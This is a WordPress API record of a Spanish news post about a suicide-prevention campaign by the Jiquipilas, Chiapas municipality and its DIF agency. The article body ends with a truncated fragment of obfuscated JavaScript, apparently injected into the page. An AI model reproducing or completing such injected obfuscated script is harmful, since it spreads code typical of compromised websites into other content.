{"id":5009,"date":"2022-09-12T02:18:58","date_gmt":"2022-09-12T02:18:58","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=5009"},"modified":"2022-09-12T02:18:59","modified_gmt":"2022-09-12T02:18:59","slug":"ayuntamiento-y-dif-jiquipilas-ponen-en-marcha-campana-de-prevencion-del-suicidio","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=5009","title":{"rendered":"Ayuntamiento y Dif Jiquipilas ponen en marcha campa\u00f1a de prevenci\u00f3n del suicidio"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/IMG-20220911-WA0016-1024x576.jpg\" alt=\"\" class=\"wp-image-5010\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/IMG-20220911-WA0016-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/IMG-20220911-WA0016-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/IMG-20220911-WA0016-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/IMG-20220911-WA0016.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u2022 Hugo L\u00e1zaro y Madely Montejo refrendaron su compromiso de respaldar estas acciones de prevenci\u00f3n.<\/p>\n\n\n\n<p>\u2022 Se impartieron pl\u00e1ticas para prevenir el suicidio a estudiantes de la escuela  secundaria Dr. Belizario Dominguez. <\/p>\n\n\n\n<p>11 de Septiembre del 2022. Jiquipilas, Chiapas._ Este 10 de septiembre se conmemor\u00f3 el d\u00eda mundial para la prevenci\u00f3n del suicidio, por lo que el Ayuntamiento que encabeza el contador C\u00e9sar Hugo L\u00e1zaro y el Dif municipal presidido por la contadora Madely Montejo pusieron en marcha una serie de pl\u00e1ticas para prevenir el suicidio.Hugo L\u00e1zaro hizo un llamado a la poblaci\u00f3n a aprender a detectar los signos de alarma de las personas que intentan quitarse la vida, pues la depresi\u00f3n y el suicidio se pueden prevenir. Destac\u00f3 que, &#8220;Para el gobierno que me honro en presidir trabajamos de manera intersectorial a trav\u00e9s del Programa Nacional y municipal para la Prevenci\u00f3n del Suicidio no s\u00f3lo por las p\u00e9rdidas humanas y el dolor que produce un acto de esta \u00edndole, sino por los efectos complejos y perdurables que tienen en la salud mental de familiares y personas cercanas de quienes se suicidan, as\u00ed como accionar los programas para este problema de salud p\u00fablica, se\u00f1al\u00f3 el presidente municipal. Por su parte Madely Montejo se\u00f1al\u00f3 que el Dif municipal, Procuradur\u00eda para la protecci\u00f3n de ni\u00f1as, ni\u00f1os, adolescentes y la familia, el \u00e1rea de prevenci\u00f3n del delito y SIPINNA municipal se sumaron a la campa\u00f1a de prevenci\u00f3n del Suicidio con platicas en la escuela secundaria Dr. Belisario Dom\u00ednguez.&#8221;Nuestro objetivo principal como instituci\u00f3n es concientizar a las y los  j\u00f3venes de que hay que estar atentos a alg\u00fan comentario o cambio de conducta de personas cercanas ya que esto puede ayudarnos a identificar alguna conducta de riesgo y trabajar en ello para evitar caer en el suicidio, as\u00ed como tambi\u00e9n hacerles saber los lugares y n\u00fameros telef\u00f3nicos a los que pueden acudir para ser canalizados de una manera profesional&#8221;, mencion\u00f3 Madely Montejo Maza.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u2022 Hugo L\u00e1zaro y Madely Montejo refrendaron su compromiso de respaldar estas acciones de prevenci\u00f3n. \u2022 Se impartieron pl\u00e1ticas para prevenir el suicidio a estudiantes de la escuela secundaria Dr. Belizario Dominguez. 11 de Septiembre del 2022. Jiquipilas, Chiapas._ Este 10 de septiembre se conmemor\u00f3 el d\u00eda mundial para la prevenci\u00f3n del suicidio, por lo &hellip;<\/p>\n","protected":false},"author":2,"featured_media":5010,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-5009","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5009","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5009"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5009\/revisions"}],"predecessor-version":[{"id":5011,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5009\/revisions\/5011"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/5010"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5009"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5009"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5009"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}